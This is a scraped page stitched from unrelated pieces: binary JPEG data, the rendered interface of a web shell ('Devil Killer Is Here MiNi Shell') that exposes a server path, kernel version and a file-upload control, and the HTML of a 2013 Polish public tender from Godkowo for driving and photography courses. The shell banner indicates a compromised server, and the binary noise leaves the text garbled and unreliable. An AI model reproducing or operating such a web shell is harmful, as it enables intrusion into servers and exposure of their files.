JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130909/365114-N-2013.html

<p class="kh_header"><b>Godkowo: Zorganizowanie i przeprowadzenie kursów zawodowych</b><br>
<b>Numer ogłoszenia: 365114 - 2013; data zamieszczenia: 09.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Godkowie , Godkowo 14, 14-407 Godkowo, woj. warmińsko-mazurskie, tel. 55 249 72 38, faks 55 249 72 57.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów zawodowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie poniżej opisanych kursów zawodowych dla uczestników projektu systemowego pn. Czas na aktywność w Gminie Godkowo realizowanego w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego: Część I - kurs prawa jazdy kat. B dla 8 osób. Przeszkolenie 8 osób skierowanych przez Gminny Ośrodek Pomocy Społecznej w Godkowie w ramach kursu prawa jazdy kat. B (dalej kurs) zgodny z ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tekst. jedn.  Dz. U. z 2012r. poz. 1137 z późn. zm.), ustawą z dnia 5 stycznia 2011r. o kierujących pojazdami (Dz. U. z 2011 r., Nr 30, poz. 151 z późn. zm.), Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców (Dz.U. z 2012r., poz. 1019) oraz Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012r. w sprawie egzaminowania osób ubiegających się o uprawnienia do kierowania pojazdami, szkolenia, egzaminowania i uzyskiwania uprawnień przez egzaminatorów oraz wzorów dokumentów stosowanych w tych sprawach (Dz. U. z 2012 r., poz. 995 z późn. zm) - (dalej obowiązujące przepisy). Celem kursu jest teoretyczne i praktyczne przygotowanie do egzaminu państwowego na prawo jazdy kategorii B. Uczestnik zapozna się z przepisami ruchu drogowego, nabędzie umiejętności obsługi i kierowania pojazdem, umiejętności bezpiecznego poruszania się w ruchu drogowym oraz udzielania pierwszej pomocy przedlekarskiej.  Czas trwania  kursu: 40 godzin zagadnień teoretycznych i 40 godzin zajęć praktycznych dla każdego uczestnika. Szczegółowe wymagania dotyczące przeprowadzenia kursu: 1. Wykonawca zobowiązany jest do zorganizowania  i opłacenia badań lekarskich  uczestników kursu w celu wydania zaświadczeń niezbędnych do rozpoczęcia kursu. W przypadku negatywnej opinii lekarza w sprawie wydania zaświadczenia dla którejś ze skierowanych osób, osoba ta nie będzie uczestniczyć w kursie i Zamawiający nie poniesie kosztów z tym związanych, poza kosztami konsultacji lekarskiej, a ilość uczestników kursu zostanie pomniejszona o te osoby, które nie uzyskają zaświadczenia; 2. Wykonawca zorganizuje i opłaci kursantom wykonanie koniecznej do wyrobienia dokumentacji fotografii; 3. Po uzyskaniu zaświadczenia lekarskiego i fotografii, Wykonawca organizuje uczestnikom projektu wyjazd do Starostwa Powiatowego w Elblągu, celem założenia tzw. Profilu Kandydata na Kierowcę; 4. Dzienny wymiar zajęć teoretycznych wynosi 5 godzin. 5. Ze względu na specyfikę zajęć praktycznych - mogą się one odbywać w godzinach ustalonych z uczestnikami we wszystkie dni tygodnia. 6. Termin uzyskania zaświadczenia wydanego przez ośrodek egzaminacyjny o zakwalifikowaniu uczestników kursu na egzamin państwowy - do 10.12.2013r. 7. Za zakończenie realizacji zamówienia uznaje się, uzyskanie przez Wykonawcę zaświadczenia o zakwalifikowaniu na egzamin państwowy, każdego uczestnika kursu, wydanego przez ośrodek egzaminacyjny; 8. Sala wykładowa, pomieszczenie biurowe oraz plac manewrowy muszą spełniać wymogi określone w § 3 Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców (Dz. U. poz. 1019); 9. Wykonawca powinien zapewnić uczestnikom na własność materiały szkoleniowe  m.in. wydruki oraz płyty CD z materiałami ćwiczeniowymi. 10. Zajęcia teoretyczne będą odbywały się na terenie miejscowości Godkowo lub w przypadku ich organizacji w innym miejscu Wykonawca bez dodatkowego wynagrodzenia zapewni transport Uczestników z miejscowości Godkowo do miejsca organizacji zajęć i z powrotem. 11. Zajęcia praktyczne (40 godz. zegarowych) w ruchu drogowym powinny odbywać się na terenie Miasta Elbląg oraz na drogach dojazdowych do tego miasta samochodami tej samej marki, na których zdawany jest egzamin państwowy. Przy czym nauka jazdy na drogach dojazdowych powinna wynosić nie więcej niż 15 godzin. 12. Kurs zakończy się: a) opracowaną przez Wykonawcę ankietą oceniającą szkolenie w następującym zakresie, minimum: jakości materiałów szkoleniowych, przydatności materiałów szkoleniowych, jakości materiałów dydaktycznych, przydatności materiałów dydaktycznych, zastosowanych środków dydaktycznych, warunków lokalowych, organizacji szkolenia, przygotowania merytorycznego prowadzących kurs, sposobu prowadzenia zajęć. Wypełnione przez każdego uczestnika zajęć ankiety, opatrzone datą wypełnienia, Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi, b) egzaminem wewnętrznym sprawdzającym stopień przyswojenia przez uczestników wiadomości objętych kursem. Wykonawca dostarczy Zamawiającemu protokół z egzaminu wewnętrznego po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi, c) egzaminem państwowym. Koszt jednokrotnego egzaminu państwowego zostanie pokryty przez Wykonawcę. Wykonawca dostarczy Zamawiającemu zaświadczenie o zakwalifikowaniu na egzamin państwowy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi; 13. Wykonawca zobowiązany jest do prowadzenia dokumentacji kursu m.in. protokołu z egzaminu wewnętrznego, zaświadczeń o zakwalifikowaniu na egzamin państwowy oraz wymienionych w wymaganiach ogólnych stawianych wykonawcy. Część II - kurs fotografii cyfrowej dla 4 osób. Przeszkolenie 4 osób skierowanych przez Gminny Ośrodek Pomocy Społecznej w Godkowie w ramach kursu fotografii cyfrowej. Celem kursu jest teoretyczne i praktyczne przygotowanie uczestników do świadomego fotografowania i obróbki zdjęć oraz obsługi fotograficznej uroczystości i dzięki temu nabycie kwalifikacji zawodowych.  Czas trwania  kursu: 40 godzin, w tym 10 godz. zagadnień teoretycznych i 30 godzin zajęć praktycznych dla każdego uczestnika. Szczegółowe wymagania dotyczące przeprowadzenia kursu: 1. Zajęcia teoretyczne przeprowadzone zostaną podczas 10 godzin. Dzienny wymiar zajęć teoretycznych wynosi 5 godzin. 2. Program zajęć teoretycznych powinien obejmować co najmniej tematykę: budowa sprzętu fotografii cyfrowej (elementy składowe aparatu fotograficznego), rodzaje aparatów, rodzaje matryc, rodzaje obiektywów, rodzaje lamp błyskowych, rodzaje kart pamięci; kompozycja i estetyka obrazu - zagadnienia teoretyczne; gatunki fotografii, m. in.: fotografia reportażowa, fotografia krajobrazowa, fotografia portretowa, fotografia reklamowa. 3. Zajęcia praktyczne (30 godz. zegarowych) powinny obejmować co najmniej: robienie zdjęć (ustawianie opcji menu, kompozycja obrazu, ostrość, ekspozycja, światło, balans bieli, tryby pracy aparatu), edycja zdjęć (katalogowanie i archiwizacja zdjęć, zmiana rozmiarów, kadrowanie, kompresja, powiększanie, zmniejszanie obrazu, retusz zdjęć, kontrast, nasycenie, filtry efektowe, fotomontaż, fotografia czarno-biała, panoramowanie), drukowanie zdjęć, wykonanie fotoksiążki, a także przeprowadzenie plenerowej sesji krajobrazu, sesji  portretowej oraz obsługę uroczystości - przeprowadzenie sesji fotograficznej podczas imprezy okolicznościowej). 4. Ze względu na specyfikę zajęć praktycznych - mogą się one odbywać w godzinach ustalonych z uczestnikami we wszystkie dni tygodnia. 5. Wykonawca zapewnia uczestnikom na własność materiały szkoleniowe niezbędne do realizacji zamówienia wymienione w wymaganiach ogólnych stawianych wykonawcy. 6. Wykonawca zapewnia uczestnikom na własność aparat fotograficzny z torbą, spełniający co najmniej parametry: obiektyw z 42-krotnym zoomem optycznym (24-1000 mm); matryca o rozdzielczości 18 mln pikseli; zaawansowana redukcja drgań z przesunięciem osi optycznej obiektywu; nagrywanie filmów Full HD (1080p/60i) z dźwiękiem stereo, ruchomy wyświetlacz LCD 3,2 cala o rozdzielczości 921 tys. punktów; zgodność z Wi-Fi; zaawansowane funkcje filmowania: podczas filmowania korzystanie z optycznego zoomu z autofokusem, wbudowane złącze HDMI; funkcja szybkich zdjęć seryjnych: do 7 ujęć w pełnej rozdzielczości z prędkością 7 klatek na sekundę lub do 30 ujęć w pełnej rozdzielczości z prędkością 1 klatki na sekundę; 19 programów tematycznych, w tym m.in. tryb robienia zdjęć w 3D, tryb Auto HDR, tryb makro, łatwa panorama 360°/180°; autofokus; autofokus śledzący obiekty w ruchu; menu retuszu; balans bieli; samowyzwalacz; złącze USB, AV; lampa błyskowa wbudowana podnoszona; karata pamięci 16GB; zasilanie -  akumulator jonowo-litowy min 1100 mAh; Gwarancja 12 miesięcy; - lub równoważny. 7. Aparat fotograficzny powinien pochodzić z bieżącej produkcji, powinien być pierwszej jakości, fabrycznie nowy (nie używany przed dniem dostawy), nie powinien pochodzić z ekspozycji i nie powinien być wcześniej  prezentowany, wystawiany  na imprezach targowych, w sklepie lub wypożyczany itp. z instrukcją w języku polskim. 8. Aparat powinien być oznakowany zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013 znajdującymi się na stronie www.efs.gov.pl 9. Zajęcia będą odbywały się na terenie miejscowości Godkowo lub w przypadku ich organizacji w innym miejscu Wykonawca bez dodatkowego wynagrodzenia zapewni transport Uczestników z miejscowości Godkowo do miejsca organizacji zajęć i z powrotem. 10. Okres realizacji: wrzesień - 10 grudzień 2013r.; 11. Kurs zakończy się: a) opracowaną przez Wykonawcę ankietą oceniającą szkolenie w następującym zakresie, minimum: jakości materiałów szkoleniowych, przydatności materiałów szkoleniowych, jakości materiałów dydaktycznych, przydatności materiałów dydaktycznych, zastosowanych środków dydaktycznych, warunków lokalowych, organizacji szkolenia, przygotowania merytorycznego prowadzących kurs, sposobu prowadzenia zajęć. Wypełnione przez każdego uczestnika zajęć ankiety, opatrzone datą wypełnienia, Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi, b) egzaminem wewnętrznym sprawdzającym stopień przyswojenia przez uczestników wiadomości objętych kursem. Wykonawca dostarczy Zamawiającemu protokół z egzaminu wewnętrznego po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi, c) przekazaniem każdemu uczestnikowi kursu płyty CD z nagraniem co najmniej 20 fotografii w formacie jpg. wykonanych przez uczestnika projektu, d) przekazaniem każdemu uczestnikowi przygotowanej przez uczestników fotoksiążki w formacie A4 z wybranymi fotografiami. 12. Wykonawca zobowiązany jest do prowadzenia dokumentacji kursu wymienionej w wymaganiach ogólnych stawianych wykonawcy. WYMAGANIA OGÓLNE STAWIANE WYKONAWCY: 1.Wymagane jest, żeby Wykonawca na bieżąco monitorował osiąganie zakładanych rezultatów i po zakończeniu realizacji zamówienia przeprowadził ich ewaluację. Raport ewaluacyjny walidujący osiągnięcie zakładanych rezultatów w formie pisemnej Wykonawca dostarczy Zamawiającemu. 2. Dokładne ustalenia i decyzje dotyczące realizacji zamówienia (takie jak szczegółowy harmonogram itp.) uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy. Wykonawca powinien wyznaczyć opiekuna kursu, czyli osobę odpowiedzialną za organizację kursu, wskazaną do kontaktu z uczestnikami kursu oraz z Zamawiającym; 3. Wykonawca określi telefony kontaktowe, numer faksu i email w celu dokonywania innych ustaleń niezbędnych dla sprawnego  i terminowego wykonania zamówienia. 4. Wykonawca uwzględni poziom zdrowia, wykształcenia, umiejętności i wiedzy uczestników szkolenia. 5. Wykonawca zobowiązany jest zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków dla wszystkich uczestników kursu. Ubezpieczenie winno obejmować uczestnictwo w zajęciach, drogę do miejsca zajęć oraz powrót do domu. Kopię polisy ubezpieczeniowej należy przekazać Zamawiającemu po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi; 6. Wykonawca ponosi pełną odpowiedzialność odszkodowawczą za szkody na osobie i mieniu, które powstaną w związku z udziałem uczestników w kursie w czasie jego trwania. Zamawiający nie ponosi w tym zakresie żadnej odpowiedzialności; 7. Po zakończeniu kursu uczestnikom powinny zostać wydane zaświadczenia o ukończeniu zajęć zgodnie z Rozporządzeniem MEN. Ponadto wydane certyfikaty, dyplomy lub zaświadczenia winny być oznakowane logiem Europejskiego Funduszu Społecznego i informacją, że projekt był współfinansowany ze środków EFS; 8. Wykonawca zobowiązany jest do przeniesienia na Zamawiającego autorskich praw majątkowych do dokumentów, opracowań i wszelkich innych materiałów wytworzonych przez siebie w ramach realizacji niniejszego zamówienia, bez ograniczeń czasowych i terytorialnych, na polach eksploatacji wskazanych w art. 50 ustawy z dnia 4 lutego 1994 roku o prawie autorskim i prawach pokrewnych (tekst jedn. Dz. U. z 2006, nr 90 poz. 631, z późn. zm.), w tym w szczególności w celu udostępniania na stronach internetowych Zamawiającego; 9. Wykonawca zobowiązany będzie do przestrzegania przepisów Ustawy z dnia 29 sierpnia 1997 roku o ochronie danych osobowych (tekst jedn. Dz.U. z 2002 r. Nr 101 poz. 926, z późn. zm.) przy gromadzeniu oraz przetwarzaniu danych  osobowych osób skierowanych na szkolenie; 10. Wykonawca oznakuje wszystkie dokumenty, materiały szkoleniowe, sprzęt i sale - związane z przygotowaniem i zorganizowaniem ww. kursów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013 znajdującymi się na stronie www.efs.gov.pl 11. Wykonawca w ramach zamówienia gwarantuje: -Zapewnienie sal szkoleniowych; - Zapewnienie odpowiedniego wyposażenia sal w sprzęt do prowadzenia zajęć (np. flipchart lub tablica klasyczna czy magnetyczna, sprzęt audiowizualny); - Zapewnienie podczas zajęć bezpieczeństwa i higieny pracy; - Zapewnienie od pierwszego dnia zajęć materiałów szkoleniowych (podręczniki lub skrypty zgodne z tematyką kursu, teczki, notesy, długopisy, ołówki itp.), które zostaną ujęte w cenie i przejdą w posiadanie uczestnika. Materiały szkoleniowe muszą być opatrzone znakami zgodnymi z wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 oraz treścią: Projekt systemowy pn. Czas na aktywność w Gminie Godkowo realizowany w ramach Programu Operacyjnego Kapitał Ludzki współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Wszystkie materiały muszą być przygotowane i rozdane uczestnikom kursu najpóźniej w pierwszym dniu zajęć. Uczestnicy kwitują odbiór materiałów własnoręcznym podpisem. Pokwitowanie i jeden komplet materiałów szkoleniowych Zamawiający otrzyma od Wykonawcy przed rozpoczęciem kursu. - Zapewnienie cateringu podczas zajęć: - poczęstunek podczas każdej z przerw tj. co najmniej kawa/herbata, ciastka: 15 dag różnych ciastek lub ciasta na 1 osobę. Ponadto 1 x 0,33 l wody mineralnej niegazowanej - 1 osobę, 1 x 0,33 l wody mineralnej gazowanej lub napoju - 1 osobę, cukier podany w cukiernicy, śmietanka do kawy, cytryny. Sposób podania - estetycznie, w formie stołu szwedzkiego z zapewnieniem filiżanek, talerzyków, szklanek, łyżeczek i serwetek w czasie trwania szkolenia oraz - posiłek dla Uczestników kursu, gdy kurs przekroczy 4 godziny zegarowe, tj. drugie danie z napojem lub sokiem (drugie danie co najmniej trzy razy w tygodniu danie mięsne). Posiłek powinien być gorący i gotowy do spożycia. Przygotowane, dostarczone i podane w estetyczny sposób posiłki będą świeże, pierwszej jakości, zamknięte w pojemnikach przeznaczonych dla produktów wymagających stałych warunków temperaturowych. Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia. - Prowadzenie: dziennika zajęć edukacyjnych zawierającego listy obecności, wymiar godzin i tematy zajęć edukacyjnych; dokumentację zdjęciową z przeprowadzonych zajęć, w której muszą znaleźć się zdjęcia wszystkich uczestników, zrobione w trakcie zajęć praktycznych i teoretycznych (dokumentacja zdjęciowa musi zostać przekazana Zamawiającemu w formie elektronicznej, na płycie CD lub DVD, a zapisana musi zostać w formacie możliwym do odczytania poprzez ogólnodostępne programy komputerowe); ankiety oceniające kurs; list obecności i odbioru cateringu oraz materiałów szkoleniowych; zaświadczenia o ukończeniu kursu; potwierdzenia odbioru przez uczestnika zaświadczeń o ukończeniu kursu; rejestru wydanych zaświadczeń, protokołu z egzaminu, polis od następstw nieszczęśliwych wypadków oraz raportu ewaluacyjnego. Dokumentacja ta powinna być sporządzona według zaleceń Zamawiającego, tzn. Wykonawca zobowiązany jest umieszczać informacje o realizowaniu kursu finansowanego z funduszy europejskich na wszystkich dokumentach związanych z jego realizacją oraz w ten sam sposób oznakować miejsce prowadzenia zajęć. Wykonawca zobowiązany jest do przekazania kserokopii w/w dokumentacji, potwierdzonej za zgodność z oryginałem wraz z fakturą w terminie 14 dni od daty zakończenia realizacji zamówienia, nie później niż do 10.12.2013 r.; - Wykonawca zapewni co najmniej 80% frekwencję Uczestników na zajęciach. - Zajęcia powinny odbywać się na terenie miejscowości Godkowo lub w przypadku ich organizacji w innym miejscu Wykonawca bez dodatkowego wynagrodzenia zapewni transport Uczestników lub zwrot kosztów dojazdu z miejscowości Godkowo do miejsca organizacji zajęć i z powrotem..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, do 50% wartości zamówienia podstawowego, polegających na powtórzeniu tych samych zajęć w przypadku, jeżeli zamówiona ilość okaże się niewystarczająca lub jeżeli zaistnieje konieczność skierowania do udziału większej ilości Uczestników i/lub jeżeli w okresie następnych trzech lat od podpisania umowy koniecznym okaże się nabycie usług tożsamych z przedmiotem zamówienia, na przykład w ramach kolejnych projektów EFS i/lub w ramach podstawowej działalności zamawiającego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0, 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonana zostanie zgodnie z regułą (spełnia - nie spełnia), w oparciu o informacje zawarte w wymaganych oświadczeniach i dokumentach. Z treści zawartych oświadczeń i dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia - oświadczenie w załączniku nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonana zostanie zgodnie z regułą (spełnia - nie spełnia), w oparciu o informacje zawarte w wymaganych oświadczeniach i dokumentach. Z treści zawartych oświadczeń i dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia - oświadczenie w załączniku nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonana zostanie zgodnie z regułą (spełnia - nie spełnia), w oparciu o informacje zawarte w wymaganych oświadczeniach i dokumentach. Z treści zawartych oświadczeń i dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia - oświadczenie w załączniku nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonana zostanie zgodnie z regułą (spełnia - nie spełnia), w oparciu o informacje zawarte w wymaganych oświadczeniach i dokumentach. Z treści zawartych oświadczeń i dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia - oświadczenie w załączniku nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonana zostanie zgodnie z regułą (spełnia - nie spełnia), w oparciu o informacje zawarte w wymaganych oświadczeniach i dokumentach. Z treści zawartych oświadczeń i dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia - oświadczenie w załączniku nr 2 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

